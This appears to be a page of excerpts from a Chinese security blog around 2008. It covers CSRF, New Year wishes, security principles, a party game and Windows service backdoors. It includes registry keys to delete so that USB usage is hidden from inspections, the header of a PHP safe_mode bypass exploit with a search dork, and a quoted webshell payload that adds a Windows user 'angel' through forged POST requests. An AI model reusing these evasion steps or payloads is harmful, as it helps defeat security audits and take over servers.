csrf - Cross-site Request Forgery 字面意思是指跨站点请求伪造，通常用来指 WEB 网站的这一类漏洞，即在某个恶意站点的页面上，促使访问者请求你的网站的某个 URL（通常会用 POST 数据方式），从而达到改变服务器端数据的目的。

看到superhei写了不少相关的文章，这几天刚好遇到。学习学习

http://superhei.blogbus.com

» 阅读全文

第一：我希望家人，朋友平平安安，健健康康。

第二：希望工作能更上一层楼。

第三：希望2008年咸鱼翻身！努力努！

第四：希望天灾人亡的事件减到最低，也希望世界和平。

第五：希望每一位朋友飞黄腾达。

第六：希望。。。希望，不懂还有什么愿望。。愿大家开开心心。。

079ba6eb

blog 聚合联盟

http://www.4sec.org

http://www.4sec.org/?action=post

致力于信息安全技术相关blog的信息聚合

javascript调用 <script language="javascript" charset="gb2312" src="http://www.sebug.net/js.php"></script>

谢谢angel，谢谢CCTV，谢谢中国共产党

有些特殊部门不允许使用移动存储设备，接受检查的时候可以用这招。
删除

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\DeviceClasses\{53f56307-b6bf-11d0-94f2-00a0c91efb8b}下的所有项
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\USB 下所有Vid开头的项
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\USBSTOR 下的所有Disk&Ven开头的项
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\UsbFlags 下所有项
c:\windows\setupapi.log 文件

//php 5.x COM functions safe_mode and disable_function bypass   
  
//author: shinnai   
//mail: shinnai[at]autistici[dot]org   
//site: http://shinnai.altervista.org   
  
//dork: intitle:phpinfo intext:"php version" +windows (thanks to rgod)   
  
//Tested on xp Pro sp2 full patched, worked both from the cli and on apache   

» 阅读全文

先看下angel忽悠我的部分源码  makeRequest('<?=$self>','POST','action=shell&execfunc=system&command=net user angel angel /add');
makeRequest('<?=$self>','POST','action=shell&execfunc=system&command=echo my_name_is_angel > c:\\angel.txt');
</script> 太牛X了，还好我先看了下代码，呼呼。估计是跟黑锅学的，这Y的不学好。前几天测试的那个版本还有部分问题，这个版本，基本上是已经很完美了，在MYSQL管理方面是大大的强。

AJAX也比较强，今天才发现他在安全技术中的重要作用了。隐蔽性超级好。什么这主动那主动防御的，在AJAX面前就什么都不是了。

一、安全理念
1、安全的隐患更多来自于企业内部
2、对于管理员的要求：不要信任任何人
3、分层保护策略：假设某些安全保护层完全失效
4、服务最小化
5、为最坏的情况做打算

二、物理安全
1、记录进出机房的人员名单，考虑安装摄像机
2、审查PROM是否被更换，可以通过记录hostid进行比较
3、每个系统的OpenBoot口令应该不一样，口令方案不可预测
4、系统安装完毕移除CD-ROM
5、将版本介质放入不在本场地的介质储藏室中

» 阅读全文

游戏概述：

　　这是一个锻炼表达能力、判断力、观察力、思维能力和表演能力…的游戏。每一个曾经参与游戏的人都会被它深深的吸引住。游戏的基础是彼此的诚实和信任，以及对游戏的 认真。

　　游戏特点：

　　1.简单易学：任何人只要明白规则或看别人玩过一盘，马上就会玩了。

　　2.参与性强：只要认真对待所扮演的角色，无论是老朋友还是第一次见面的新朋友，马上会“杀”成一片。

» 阅读全文

一> 序言
    windows下的服务程序都遵循服务控制管理器(SCM)的接口标准，它们会在登录系统时自动运行，甚至在没有用户登录系统的情况下也会正常执行，类似与UNIX系统中的守护进程(daemon)。它们大多是控制台程序，不过也有少数的GUI程序。本文所涉及到的服务程序仅限于windows2000/XP系统中的一般服务程序，不包含windows9X。本文相关服务级后门程序和代码可以到我们的主页FZ5FZ下载。

二> windows服务简介
    服务控制管理器拥有一个在注册表中记录的数据库，包含了所有已安装的服务程序和设备驱动服务程序的相关信息。它允许系统管理员为每个服务自定义安全要求和控制访问权限。windows服务包括四大部分：服务控制管理器(Service Control Manager)，服务控制程序(Service Control Program)，服务程序(Service Program)和服务配置程序(Service Configuration Program)。

» 阅读全文